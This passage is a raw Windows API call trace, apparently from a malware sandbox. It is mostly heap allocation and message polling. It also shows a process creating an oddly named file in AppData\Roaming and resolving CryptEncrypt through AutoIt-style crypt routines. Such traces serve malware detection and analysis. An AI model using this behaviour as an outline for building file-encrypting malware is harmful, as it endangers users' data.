hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0223.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0223.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0223.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0223.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0223.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0223.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0223.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0223.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0223.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.756] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0223.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0223.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0223.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0223.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0223.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.758] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.ATHv.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.athv.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0223.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0223.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0223.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0223.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0223.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0223.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0223.758] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0223.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0223.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0223.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0223.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0223.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0223.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0223.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0223.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0223.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe55020 [0223.762] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0223.762] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x3f24, lpOverlapped=0x0) returned 1 [0223.765] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0223.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0223.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0223.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f24) returned 0x3bf0dd8 [0223.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe55020 | out: hHeap=0x970000) returned 1 [0223.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0223.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0223.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0223.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0223.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0223.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0223.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f24) returned 0x2f14818 [0223.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0223.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0223.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f24) returned 0x3bf0dd8 [0223.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0223.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0223.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0223.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0223.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0223.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0223.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0223.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0223.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0223.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0223.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0223.771] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0223.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0223.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f24) returned 0x3bf0dd8 [0223.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d78 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0223.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f68 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0223.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55048 [0223.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f24) returned 0x2f18748 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0223.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0223.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0223.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0223.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0223.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0223.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0223.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0223.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0223.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0223.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0223.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0223.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0223.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.777] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0223.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0223.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.777] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0223.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0223.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.777] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.777] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0223.777] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0223.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0223.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.777] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.777] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0223.778] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0223.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0223.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.778] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51490, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0223.779] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0223.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0223.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f5a8 [0223.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0223.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0223.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.779] 